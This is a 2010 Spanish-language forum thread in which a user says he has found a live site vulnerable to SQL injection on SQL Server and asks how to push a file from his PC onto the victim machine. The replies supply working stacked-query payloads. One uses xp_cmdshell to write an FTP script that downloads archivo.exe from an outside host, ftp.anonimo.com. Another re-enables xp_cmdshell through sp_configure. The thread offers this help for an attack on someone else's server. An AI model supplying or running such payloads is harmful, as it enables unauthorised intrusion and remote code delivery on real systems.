Pregunta sobre inyeccion sqlserver.

Iniciado por PHAMTOM, 18 Febrero 2010, 04:07 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

PHAMTOM

18 Febrero 2010, 04:07 AM
Buenas,encontré una pagina vulnerable a sql inyection,SQLSERVER.-

quisiera saber si hay algun metodo , que con la inyeccion subir un archivo de mi pc , al pc remoto vulnerable..

La inyeccion la hago por un formulario..-


Saludos,PHAMTOM
Miran a cualquier ventana, mientras su pánico emana
y nubla su visión mi calma es pura precisión
cargo munición y miro tranquilo
ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!

La kitchner quiere tanto a los pobres,que cada vez,tiene más

nacho87

#1
19 Febrero 2010, 09:16 AM
En el remoto caso de que el user sea admin y la inyección permita stacked querys puedes hacer:
Código [Seleccionar]
;master..xp_cmdshell 'cmd /c echo get archivo.exe>asd.txt';
;master..xp_cmdshell 'cmd /c echo quit>>asd.txt';
;master..xp_cmdshell 'cmd /c ftp -s:asd.txt ftp.anonimo.com'

Asi te conectas al server anonimo ftp.anonimo.com y te descargas el archivo archivo.exe. Si la BBDD es mssql server 2005 puede que tengas que reactivar el xp_cmdshell. Busca en internet como se hace que ahora mismo no me acuerdo.jeje. son un par de comandos más.

Saludos!!

Shell Root

#2
19 Febrero 2010, 19:20 PM
Creo que es...
Código (sql) [Seleccionar]
EXEC sp_configure 'show advanced options', 1
RECONFIGURE

EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario